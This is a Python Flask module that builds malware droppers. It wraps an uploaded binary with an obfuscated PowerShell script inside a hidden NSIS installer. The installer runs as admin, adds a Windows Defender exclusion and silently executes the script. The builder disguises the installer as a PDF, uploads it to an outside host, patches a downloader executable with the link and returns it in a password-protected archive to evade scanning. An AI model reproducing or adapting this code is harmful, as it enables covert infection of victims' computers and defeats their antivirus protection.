Spaces:
Running
Running
import os | |
import subprocess | |
import random | |
import string | |
from datetime import datetime | |
from flask import request, jsonify, current_app, make_response, send_file | |
import shutil | |
import tempfile | |
import requests | |
import json | |
import secrets | |
BASE_DIR = os.path.abspath(os.path.dirname(__file__)) | |
UPLOAD_FOLDER = os.path.join(BASE_DIR, "uploads") | |
PE_FOLDER = os.path.join(BASE_DIR, "pe") | |
COMPILE_FOLDER = os.path.join(BASE_DIR, "compile") | |
NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system | |
OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1") | |
UPLOAD_URL = 'https://ambelo-benjamin.hf.space/upload' | |
POWERSHELL_FILE_PATH = os.path.join(PE_FOLDER, "powerv4.ps1") | |
def generate_random_string(length=8): | |
return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) | |
def obfuscate_powershell_script(ps1_path): | |
try: | |
cmd = f'pwsh -f "{OBFUSCATOR_SCRIPT}"' | |
current_app.logger.info(f"Running obfuscation command: {cmd}") | |
current_app.logger.info(f"Input PowerShell script path: {ps1_path}") | |
process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True) | |
process.stdin.write(f"{ps1_path}\n") | |
process.stdin.flush() | |
stdout, stderr = process.communicate() | |
# Log the stdout and stderr for debugging | |
current_app.logger.info(f"Obfuscation script stdout: {stdout}") | |
current_app.logger.error(f"Obfuscation script stderr: {stderr}") | |
if process.returncode != 0: | |
raise Exception(f"Error obfuscating PowerShell script: {stderr}") | |
# Check if the obfuscated file was created | |
obfuscated_file = ps1_path.replace(".ps1", "_obf.ps1") | |
if not os.path.exists(obfuscated_file): | |
raise FileNotFoundError(f"Obfuscated file not found: {obfuscated_file}") | |
return obfuscated_file | |
except Exception as e: | |
raise Exception(f"Obfuscation failed: {str(e)}") | |
def generate_nsi_script(folder_path, bin_file, ps1_file): | |
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S") | |
installer_output = os.path.join(folder_path, f"setup_{timestamp}.exe") | |
# NSIS script template | |
NSIS_SCRIPT_TEMPLATE = r""" | |
; NeuraScope Insight Installer Script | |
!include "MUI2.nsh" | |
!include "LogicLib.nsh" | |
; Basic definitions | |
Name "ProductName" | |
OutFile "{installer_output}" | |
InstallDir "$WINDIR\..\ProgramData\Installer" | |
RequestExecutionLevel admin | |
SetCompressor /SOLID lzma | |
SetCompressorDictSize 96 | |
SetDatablockOptimize ON | |
; Interface settings | |
!define MUI_WELCOMEPAGE_TITLE "Welcome to ProductName Setup" | |
!define MUI_WELCOMEPAGE_TEXT "This will install ProductName on your computer.$\r$\n$\r$\nClick Install to continue." | |
; Pages | |
!insertmacro MUI_PAGE_WELCOME | |
!insertmacro MUI_PAGE_INSTFILES | |
!insertmacro MUI_LANGUAGE "English" | |
; Basic Version Information | |
VIProductVersion "1.0.0.0" | |
VIAddVersionKey "ProductName" "ProductName" | |
VIAddVersionKey "CompanyName" "CompanyName" | |
VIAddVersionKey "LegalCopyright" "LegalCopyright" | |
VIAddVersionKey "FileVersion" "1.0.0.0" | |
VIAddVersionKey "FileDescription" "FileDescription" | |
ShowInstDetails hide | |
AutoCloseWindow true | |
Section "MainSection" SEC01 | |
SetDetailsPrint none | |
SetOutPath "$WINDIR\..\ProgramData\Installer" | |
File "{bin_file}" | |
File "{ps1_file}" | |
ExecShell "open" "powershell.exe" '-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess \"powershell.exe\""' SW_HIDE | |
Sleep 10000 | |
ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE | |
SetAutoClose true | |
SectionEnd | |
""" | |
script_content = NSIS_SCRIPT_TEMPLATE.format( | |
installer_output=installer_output, | |
bin_file=bin_file, | |
ps1_file=ps1_file, | |
) | |
nsi_file_path = os.path.join(COMPILE_FOLDER, f"installer_{timestamp}.nsi") | |
with open(nsi_file_path, 'w') as file: | |
file.write(script_content) | |
return nsi_file_path, installer_output | |
def compile_nsi_script(nsi_file_path): | |
try: | |
compile_cmd = [NSIS_COMPILER, nsi_file_path] | |
compile_result = subprocess.run(compile_cmd, capture_output=True, text=True) | |
if compile_result.returncode != 0: | |
raise Exception(f"NSIS Compile Error: {compile_result.stderr}") | |
return compile_result | |
except subprocess.CalledProcessError as e: | |
raise Exception(f"Compilation failed: {str(e)}") | |
except Exception as e: | |
raise Exception(f"Unexpected error during compilation: {str(e)}") | |
def upload_file_to_server(file_path): | |
try: | |
# Rename the .exe file to .pdf | |
renamed_file_path = file_path.replace('.exe', '.pdf') | |
os.rename(file_path, renamed_file_path) | |
# Upload the renamed file to the server | |
with open(renamed_file_path, 'rb') as file: | |
response = requests.post(UPLOAD_URL, files={'file': file}) | |
if response.status_code == 200: | |
data = response.json() | |
# Assuming the server returns a 'file_url' key with the file URL | |
filename = os.path.basename(renamed_file_path) | |
fixed_url = f'https://ambelo-benjamin.hf.space/uploads/{filename}' # Fixed URL format | |
return fixed_url | |
else: | |
raise Exception(f"Failed to upload file: {response.json()}") | |
except Exception as e: | |
raise Exception(f"Error during file upload: {str(e)}") | |
def replace_url_in_exe(file_path, old_url, new_url, old_string, new_string): | |
if len(new_url) > len(old_url): | |
raise ValueError("New URL must not be longer than the old URL.") | |
new_url_padded = new_url.ljust(len(old_url), '\x00') | |
new_string_padded = new_string.ljust(len(old_string), '\x00') | |
try: | |
with open(file_path, 'rb') as exe_file: | |
data = exe_file.read() | |
# Try different encodings of the old URL | |
encodings = ['utf-8', 'ascii', 'utf-16le'] | |
url_found = False | |
for encoding in encodings: | |
old_url_bytes = old_url.encode(encoding) | |
if old_url_bytes in data: | |
print(f"URL found with encoding: {encoding}") | |
url_found = True | |
break | |
if not url_found: | |
raise ValueError(f"The URL {old_url} was not found in the executable using any common encoding.") | |
# Try different encodings for the old string | |
string_found = False | |
for encoding in encodings: | |
old_string_bytes = old_string.encode(encoding) | |
if old_string_bytes in data: | |
print(f"String found with encoding: {encoding}") | |
string_found = True | |
break | |
if not string_found: | |
raise ValueError(f"The string {old_string} was not found in the executable using any common encoding.") | |
# Replace the old URL with the new URL | |
new_url_bytes = new_url_padded.encode(encoding) | |
modified_data = data.replace(old_url_bytes, new_url_bytes, 1) | |
# Replace the old string with the new string | |
new_string_bytes = new_string_padded.encode(encoding) | |
modified_data = modified_data.replace(old_string_bytes, new_string_bytes, 1) | |
# Save the modified executable with a random name | |
modified_file_path = os.path.join(os.path.dirname(file_path), generate_random_string() + ".exe") | |
with open(modified_file_path, 'wb') as modified_file: | |
modified_file.write(modified_data) | |
return modified_file_path | |
except Exception as e: | |
raise Exception(f"An error occurred: {e}") | |
# Function to generate a random password | |
def generate_random_password(length=12): | |
# Use a combination of letters, digits, and special characters | |
characters = string.ascii_letters + string.digits + "!@#$%^&*" | |
return ''.join(secrets.choice(characters) for _ in range(length)) | |
# Function to create an encrypted 7z archive | |
def create_encrypted_7z_archive(file_path, password): | |
archive_name = generate_random_string(30) + ".7z" # Generate a 30-character long name | |
archive_path = os.path.join(os.path.dirname(file_path), archive_name) | |
# Use 7z command to create an encrypted archive | |
try: | |
subprocess.run([ | |
"7z", "a", "-t7z", "-mx=9", "-m0=LZMA2", f"-p{password}", archive_path, file_path | |
], check=True) | |
except subprocess.CalledProcessError as e: | |
raise Exception(f"Failed to create encrypted 7z archive: {e}") | |
return archive_path | |
def process_request(request): | |
temp_dir = None # Initialize temp_dir to be used in the finally block | |
try: | |
# Save the incoming binary file | |
if 'file' not in request.files: | |
raise ValueError("No file part in the request") | |
file = request.files['file'] | |
if file.filename == '': | |
raise ValueError("No selected file") | |
random_folder = generate_random_string() | |
temp_dir = tempfile.mkdtemp(prefix=random_folder, dir=UPLOAD_FOLDER) | |
bin_path = os.path.join(temp_dir, file.filename) | |
file.save(bin_path) | |
# Extract the file name from the full binary path | |
bin_file_name = os.path.basename(bin_path) | |
# Read the PowerShell content from the local file | |
with open(POWERSHELL_FILE_PATH, 'r') as ps1_file: | |
ps1_content = ps1_file.read() | |
# Replace the placeholder with the actual binary file name | |
ps1_content = ps1_content.replace("{bin_file_name}", bin_file_name) | |
ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1") | |
with open(ps1_path, 'w') as ps1_file: | |
ps1_file.write(ps1_content) | |
# Obfuscate the PowerShell script | |
obfuscated_ps1_path = obfuscate_powershell_script(ps1_path) | |
# Check if the obfuscated file exists before renaming | |
if not os.path.exists(obfuscated_ps1_path): | |
raise FileNotFoundError(f"Obfuscated file not found: {obfuscated_ps1_path}") | |
# Rename the obfuscated file to Verification.ps1 | |
verification_ps1_path = os.path.join(temp_dir, "Verification.ps1") | |
os.rename(obfuscated_ps1_path, verification_ps1_path) | |
# Generate and compile the NSIS script | |
nsi_file_path, installer_output = generate_nsi_script(temp_dir, bin_path, verification_ps1_path) | |
compile_nsi_script(nsi_file_path) | |
# Upload the resulting EXE file (renamed to PDF) to the server | |
download_url = upload_file_to_server(installer_output) | |
# Print the new string and new URL for debugging | |
new_string = os.path.basename(download_url) | |
new_url = download_url | |
print(f"new_string: {new_string}") | |
print(f"new_url: {new_url}") | |
# Replace URL in PE executable | |
pe_exe_path = os.path.join(PE_FOLDER, "pe10.exe") | |
modified_pe_path = replace_url_in_exe( | |
file_path=pe_exe_path, | |
old_url="setup_20250102_062242.pdf", | |
new_url=os.path.basename(download_url), | |
old_string="setup_20250102_062243.pdf", | |
new_string=os.path.basename(download_url) | |
) | |
# Generate a random password | |
password = generate_random_password() | |
# Create an encrypted 7z archive | |
archive_path = create_encrypted_7z_archive(modified_pe_path, password) | |
# Return the .7z file with the password in the headers | |
response = make_response(send_file( | |
archive_path, | |
as_attachment=True, | |
download_name=os.path.basename(archive_path), | |
mimetype='application/octet-stream' | |
)) | |
response.headers['X-Password'] = password | |
return response | |
except Exception as e: | |
current_app.logger.error(f"An error occurred: {str(e)}") | |
return jsonify({"error": str(e)}), 500 | |
finally: | |
# Clean up temporary directories and files | |
if temp_dir and os.path.exists(temp_dir): | |
shutil.rmtree(temp_dir, ignore_errors=True) |